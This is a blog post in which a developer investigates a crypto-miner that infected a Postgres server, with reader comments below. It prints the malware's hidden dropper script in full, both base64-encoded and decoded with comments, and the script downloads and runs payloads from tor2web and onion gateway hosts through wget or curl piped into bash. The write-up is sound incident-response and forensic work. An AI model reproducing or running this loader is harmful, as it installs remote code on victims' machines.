A database machine I was handling got infected by a malware, potentially a crypto miner, via a feature in Postgres. This feature, due to our recent shifting of infra resulting in lax of security policies almost cost us couple days of hair pulling.
CVE-2019-9193: Not a Security Vulnerability
This post is an account of how I investigated into the issue and thwarted the attack (hopefully :D. The rogue process has not started again, yet).
The Problem
It started with our api server showing logs of database not found. ๐ฑ
The database had been deleted suddenly. Checking the logs of postgres, a delete command particularly was issued by the postgres user.
Looking at the htop, this was the output. There was a random process started by postgres user hogging all CPU resources.
One of the things I have not grasped about this yet, if the intention was to use our CPU resources, why delete the database?
And also, how did the script understand in particular which database to delete, (it is possible it could have deleted whatever databases which were available one by one but since we had only one DB, its seemed odd).
Salvage
Going by my earlier experiences, I thought of just killing the process and adding security restrictions to pg_hba file for further security. But lo, 10 minutes after killing the process the script was up again. ๐.
So we decided to recreate machine from the backup we had of couple days ago. All good, right?
NO.
As you might have guessed, the server was infected some days ago, just the db was deleted today. So minutes after starting the machine again, there was once again this random process hogging the CPU.
The first thing we did was to revoke access of postgres user from our main DB and meanwhile create a new machine from scratch and then transfer our DB to it ๐ข.
The Investigation
While a new machine was getting created, which was taking a lot of time due to large disk size, I happened to read this article while researching about celery tasks stopping.
Celery: Distributed Task Queue
This was the article I was reading -
Using strace to Debug Stuck Celery Tasks | Caktus Group
Reading this article I realised I could strace and lsof for investigating into my issue as well.
strace is a powerful command line tool for debugging and trouble shooting programs in Unix-like operating systems such as Linux. It captures and records all system calls made by a process and the signals received by the process.
https://www.tecmint.com/strace-commands-for-troubleshooting-and-debugging-linux/
lsof is a command meaning "list open files", which is used in many Unix-like systems to report a list of all open files and the processes that opened them.
https://en.wikipedia.org/wiki/Lsof
Steps
-
Checked strace of the cpu hogging command (CHC). Looked like it was mostly waiting and was receiving some json messages every now and then.
-
checked lsof of CHC - checked file descriptors pointing to a file in temp - which has pid of another process - main process (MP). [tmp/.X11-unix/11 file contained a number which when I checked in ps aux output gave another randomly named process running by postgres user.
Checked strace of MP - the command was mostly sleeping. A THEORY - The MP is starting the CHC every time CHC is killed [Seems obvious now, I know but validating it experimentally is some thing ๐]
-
To check my theory, I killed CHC, kept monitoring htop and strace of MP. Indeed, activity happened in PO strace and couple unprecedented calls happened in htop via postgres user.
Voila. Theory Validated.
Now having established relation between CHC and MP, I looked at lsof of MP. The lsof showed a deleted file in /var/lib/postgres folder. This file was also in lsof output of CHC. This made me look into the folder carefully.
-
When I ran ls -lah in the postgres folder, lo, the culprits.
Look at the hidden files .kpccv.sh and .wget-hsts. It had also created a known-hosts file in .ssh folder which was created by postgres user. Finally I deleted the listed files in the folder and killed MP and CHC. It has been few days, the server is fine, I hope all is good ๐
Following are the contents of .kpccv.sh
#!/bin/bash
exec &>/dev/null
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD10ZW5jZW50eGp5NWtwY2N2CmRpcj0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmZvciBpIGluICRkaXIgL3RtcCAvdmFyL3RtcCAvZGV2L3NobSAvdXNyL2JpbiA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKeCgpIHsKZj0vaW50CmQ9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQp3Z2V0IC10MSAtVDk5IC1xVS0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAkMSRmIC1PJGQgfHwgY3VybCAtbTk5IC1mc1NMa0EtICQxJGYgLW8kZApjaG1vZCAreCAkZDskZDtybSAtZiAkZAp9CnUoKSB7Cng9L2Nybgp3Z2V0IC10MSAtVDk5IC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgJDEkeCB8fCBjdXJsIC1tOTkgLWZzU0xrQS0gJDEkeAp9CmZvciBoIGluIGQyd2ViLm9yZyBvbmlvbi5tbiB0b3Iyd2ViLmlvIHRvcjJ3ZWIudG8gb25pb24udG8gb25pb24uaW4ubmV0IDR0b3IubWwgb25pb24uZ2xhc3MgY2l2aWNsaW5rLm5ldHdvcmsgdG9yMndlYi5zdSBvbmlvbi5seSBvbmlvbi5wZXQgb25pb24ud3MKZG8KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wMHxoZWFkIC1uIDEpL2lvOyB0aGVuCnggdGVuY2VudHhqeTVrcGNjdi4kaAplbHNlCmJyZWFrCmZpCmRvbmUKCmlmICEgbHMgL3Byb2MvJChjYXQgL3RtcC8uWDExLXVuaXgvMDB8aGVhZCAtbiAxKS9pbzsgdGhlbgooCnUgJHQuZDJ3ZWIub3JnIHx8CnUgJHQub25pb24ubW4gfHwKdSAkdC50b3Iyd2ViLmlvIHx8CnUgJHQudG9yMndlYi50byB8fAp1ICR0Lm9uaW9uLnRvIHx8CnUgJHQub25pb24uaW4ubmV0IHx8CnUgJHQuNHRvci5tbCB8fAp1ICR0Lm9uaW9uLmdsYXNzIHx8CnUgJHQuY2l2aWNsaW5rLm5ldHdvcmsgfHwKdSAkdC50b3Iyd2ViLnN1IHx8CnUgJHQub25pb24ubHkgfHwKdSAkdC5vbmlvbi5wZXQgfHwKdSAkdC5vbmlvbi53cwopfGJhc2gKZmkK|base64 -d|bash
Conclusions
- Keep your database port open only to trusted machines.
- Change the default port as they are the ones usually attacked.
- strace and lsof are useful commands to keep in mind for debugging from a system level, especially for untrusted/unknown processes.
I am still not very clear what exactly was happening in the attack, also because I was too keen to remove it and didn't pry more. Comments are welcome.
Update 1.
I looked into the code that Daniel decoded. Here is a bit commented version of that. I tried to dig more into it but was stuck at the part where it tries to reach out a url using wget or curl. The incoming result then is executed into bash. I tried using tor browser too but to no result. Maybe the endpoint has now been taken down. It would be useful if someone could decipher more what is happening in the code more that what I have done. (I only know bash scripting from SO :P)
exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
t=tencentxjy5kpccv
# match the passwd file with pattern
# (id -u commands gives the number id of current user)
# grep x:$(id -u) matches the entry in passwd file of postgres user
# and then using cut command find the 6th entry splitted using ":"
# the result is home directory of postgres user /var/lib/postgresql
dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
# run exit command in each of the following directory. What does this achieve?
for i in $dir /tmp /var/tmp /dev/shm /usr/bin ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
x() {
: "
this function just downloads the param and stores it with name of date md5 does not execute anything/. But since
it is making it executable, something else is executing it, don't know what.
"
f=/int
# do an md5sum hash of current date, split the output by <-> and take first element, which is essentialy the md5 digest
# of current date
d=./$(date|md5sum|cut -f1 -d-)
#wget 1 tries, timeout 99 seconds
wget -t1 -T99 -qU- --no-check-certificate $1$f -O$d || curl -m99 -fsSLkA- $1$f -o$d
chmod +x $d;$d;rm -f $d
}
u() {
x=/crn
wget -t1 -T99 -qU- -O- --no-check-certificate $1$x || curl -m99 -fsSLkA- $1$x
}
: '
for each of the d2web.org.. strings as <h>
check if the process id written on top of /tmp/.X11-unix/00 file is doing any io by checking proc/<pid>/io file
if it is not then call the function x with param tencentxjy5kpccv.<h>
'
for h in d2web.org onion.mn tor2web.io tor2web.to onion.to onion.in.net 4tor.ml onion.glass civiclink.network tor2web.su onion.ly onion.pet onion.ws
do
if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
# call function x with the full url, where it appends it with /int calls wget
x tencentxjy5kpccv.$h
else
break
fi
done
if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
(
# call the function on tencentxjy5kpccv.d2web.org or .. and if any of the call works pipe it into bash
u $t.d2web.org ||
u $t.onion.mn ||
u $t.tor2web.io ||
u $t.tor2web.to ||
u $t.onion.to ||
u $t.onion.in.net ||
u $t.4tor.ml ||
u $t.onion.glass ||
u $t.civiclink.network ||
u $t.tor2web.su ||
u $t.onion.ly ||
u $t.onion.pet ||
u $t.onion.ws
)|bash
fi
Top comments (15)
Hey!
Have you looked at the base64 encoded payload at all?
The long string that is being echoed is piped into
base64 -d
which decodes the base64 and the result is piped into bash for execution.The decoded payload that is piped into bash is the following script (click here if gist doesn't load):
To correctly assess your situation and the impact this might have had on your systems and users you should definitely take a look to see what effects on your server and data this script might have had.
A very nice tool for this kind of forensic work is GCHQs CyberChef. It has lot's of functions for encoding and decoding different formats.
For anyone else interested, here is the malicious script after base64 decode and some tidying up:
Thanks Valts, I have added a bit commented (whatever I could understand) version to post itself. Please comment if I might have done anything wrong there.
Thanks Daniel. Don't know why I missed the piping into base64 -d command. Never had seen that command so my brain missed it :D. This has become more interesting. Am looking into what is this script doing
Nice! Hope it's nothing too serious.
I'm also using this corona isolation time to analyze a phishing attempt against me that took place a few weeks ago.
Guess I'll be having a series of articles up over the next days :D
Very interesting stuff! Thanks a lot for sharing your experience.....
Interesting article and nice investigation work! I just checked the CVE you linked to, and it mentions that the exploit only works by connecting as postgres superuser.
Could you figure out how that exploit was executed in your case? Was it a weak postgres password, or maybe a default installation password? What did you do to tighten your server security?
No Thomas, we couldn't figure out how the exploit was executed since we had a strong password in place even though the default postgres port was open. We setup the firewall rules as well as added entry to pg_hba files to allow only trusted machines the access
I know this is an old post, but in case you guys still wanted to know how the exploit was executed I'm going to leave this unit42.paloaltonetworks.com/pgmine....
And thank you again, the post and the comment turned out to be extremely helpful.
Cheers
I had the same issue as well in three different isolated servers!
Thanks for the write up. I spend a couple of hours trying to figure out but still scratching my head as to where is the malware coming from.
Our postgresql is running in a docker environment along with a strong password. On top of it, I am only using it for development.
dev-to-uploads.s3.amazonaws.com/i/...
Do you have any suggestion on strengthening the security?
Thanks for this post. I was hit as well and traced it using the steps above.
Here is the decoded contents of the hidden file
pgsql/.systemd-service.sh
Hi,
Thanks for the info,
i am facing the same malware attack, following up with the articles, try to patch the leak, not sure after you have deleted the files and folders, did the malware find it's way back again ?
I found that we need to delete the cron task as well ,
Scheduled Cron Jobs , for mine , it looks something like this,
by user postgre and run this command , /var/lib/postgresql/.systemd-service.sh > /dev/null 2>&1 &
I am trying to find out why and how it created itself under my cron task.
And need to seal out all the potential leaks.
If any one of you have more info. or advice, please share, thanks a lot.
Excellent investigations. Thank you for sharing it. The same happened to a colleague and I'm trying to remove the malware files. By the way, can you list all files you had to delete?
Thank you, again.
Mauricio
I just want to thank you as this was the clearest path for me to find why postgres was chewing up so many cycles. Not exactly the same (filenames, etc.), but the same pattern.
Thank you!
Hi, thanks a lot for this post. It really help understanding whats going on on my server.